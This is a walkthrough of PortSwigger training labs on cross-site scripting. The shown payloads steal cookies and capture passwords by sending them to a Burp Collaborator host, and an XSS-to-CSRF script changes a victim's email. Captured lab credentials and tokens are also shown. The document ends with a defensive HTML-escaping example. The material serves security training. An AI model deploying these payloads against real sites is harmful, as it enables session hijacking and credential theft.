Cross site scripting | XSS explained (PortSwigger solve)

Reflected XSS lab
For this lab we are going to open a post and submit a comment while intercepting all requests in the background with the Burp Suite tool. Then we send the request to Repeater and prepare our payload:

<script>document.location='http://yourID.burpcollaborator.net/?'+document.cookie</script>

We send it from Repeater and wait for the callback to arrive in Burp Collaborator. Also, select the payload in Burp and press CTRL+U to URL-encode it before sending.
secret=avJbuCyJJiBnI7NFZJ4sbbdOXdKAb4Py; session=4TWOZsQYlS5PASECvxhQPUONxdZ5qi6l

Lab 3 : Exploiting cross-site scripting to capture passwords

<input required="" type="username" name="username">
<input required="" type="password" name="password">
document.getElementsByName("username")[0].value
document.getElementsByName("password")[0].value
<input required="" type="username" name="username"><input required="" type="password" name="password"><script>document.location='your-burpC-ID.burpcollaborator.net/?'+document.getElementsByName("username")[0].value+'&'+document.getElementsByName("password")[0].value</script>
But it arrives without any values. This can happen because, at the moment document.location is set, the browser's autofill has not yet populated the fields, so we use the onchange attribute instead:

<input required="" type="username" name="username"><input required="" type="password" name="password" onchange="document.location='http://YOUR-ID.burpcollaborator.net/?'+document.getElementsByName('username')[0].value+'&'+document.getElementsByName('password')[0].value">
administrator:ef6gbovly0a77qvxul8i

Lab: Exploiting XSS to perform CSRF

POST /email/change-email HTTP/1.1
Host: ac411fe71f8b856f80352cd100b300fe.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: https://ac411fe71f8b856f80352cd100b300fe.web-security-academy.net
DNT: 1
Connection: close
Referer: https://ac411fe71f8b856f80352cd100b300fe.web-security-academy.net/email
Cookie: session=aFgfuzayL8jK1xA5jr3j6Z1fQvH6Kbsv
Upgrade-Insecure-Requests: 1

email=a%40a.a&csrf=6f8A1jOKIzioIeAGRZayu2KCRH2q0mTf
<script>
// Fetch the /email page so its CSRF token can be read from the response
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
  // Extract the csrf token from the hidden form field in the fetched page
  var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
  // Submit the change-email request; the browser attaches the victim's session cookie
  var changeReq = new XMLHttpRequest();
  changeReq.open('post', '/email/change-email', true);
  changeReq.send('csrf='+token+'&email=a@a.a')
};
</script>
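As an added defensive example (not from the lab write-up or PortSwigger's own code): all three labs above start from the comment field being inserted into the page as raw HTML. The snippet below shows that vulnerable concatenation beside a hardened version that HTML-encodes the value; the function names are hypothetical and the sample comment is constructed, modelled on the first lab's payload.

```javascript
// Added defensive example, not code from the lab write-up or from PortSwigger.
// Encoding the HTML metacharacters for the text context the value lands in turns
// injected markup (script tags, event-handler attributes) into inert text.
// Function names and the sample comment are hypothetical / constructed.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
};

// Encoder for the HTML text context and for double-quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable rendering: user input is concatenated into the template untouched,
// which is what lets a <script> tag in a comment run for every other visitor.
function renderCommentUnsafe(author, body) {
  return `<p class="comment"><b>${author}</b>: ${body}</p>`;
}

// Hardened rendering: every untrusted value is encoded before it reaches the page.
function renderCommentSafe(author, body) {
  return `<p class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</p>`;
}

// Constructed sample comment, modelled on the cookie-stealing payload from the first lab.
const SAMPLE_BODY =
  "<script>document.location='http://yourID.example/?'+document.cookie</script>";

console.log(renderCommentUnsafe('guest', SAMPLE_BODY)); // tag survives: executes
console.log(renderCommentSafe('guest', SAMPLE_BODY));   // &lt;script&gt;...: plain text
```

Encoding must match the output context; a value placed inside a JavaScript string or a URL needs the encoder for that context, not this HTML one.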

vijay nariyal
Career in Cyber security. Technology lover.